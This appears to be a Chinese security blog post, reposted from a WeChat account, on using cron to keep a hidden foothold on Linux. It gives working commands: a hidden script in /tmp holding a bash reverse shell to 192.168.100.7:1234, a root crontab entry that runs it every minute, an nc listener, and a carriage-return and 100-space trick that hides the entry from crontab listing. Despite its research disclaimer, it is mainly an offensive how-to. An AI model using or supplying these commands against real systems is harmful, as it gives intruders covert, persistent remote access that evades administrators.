2024年2月26日22:10:25评论11 views字数 799阅读2分39秒阅读模式

请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者和本公众号无关，如有侵权，告知即删并致歉，感谢！

什么是Cron?

‌‌‌　　在Linux系统中，计划任务一般是由cron承担，我们可以把cron设置为开机时自动启动。cron启动后，它会读取它的所有配置文件（全局性配置文件/etc/crontab，以及每个用户的计划任务配置文件），然后cron会根据命令和执行时间来按时来调用工作任务。‌‌‌

在这里学习计划任务

https://www.runoob.com/linux/linux-comm-crontab.html

http://cron.ciding.cc/

‌‌

部署Cron后门

‌‌‌　　我们可以利用这个计划任务功能进行反弹Shell。

‌‌‌  echo -e '#!/bin/bashnbash -i >& /dev/tcp/192.168.100.7/1234 0>&1' > /tmp/.niuma.sh
‌‌‌  chmod +x /tmp/.niuma.sh

‌‌‌　　将要运行的脚本文件添加到计划任务里

‌‌‌  echo '*/1 * * * * root /tmp/.niuma.sh' | tee -a /etc/crontab
# */1 * * * * 表示每分钟都会运行一次该命令。

‌‌‌　　我们在攻击端使用nc -lvvp 1234 监听1234端口等待一分钟后的反弹shell

这样很明显管理员就看到了,我们可以简单的

(crontab -l;printf "*/1 * * * * root /tmp/.niuma.sh;rno crontab for `whoami`%100cn")|crontab -

;r：这是一个分号和回车符，用于终止cron任务并另起一行。
%100c 用于插入 100 个空格字符。

我们使用隐藏后直接查看是看不到的。因为他被空格隐藏到最下面了

原文始发于微信公众号（河马安全区）：Linux权限维持-Crontab

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。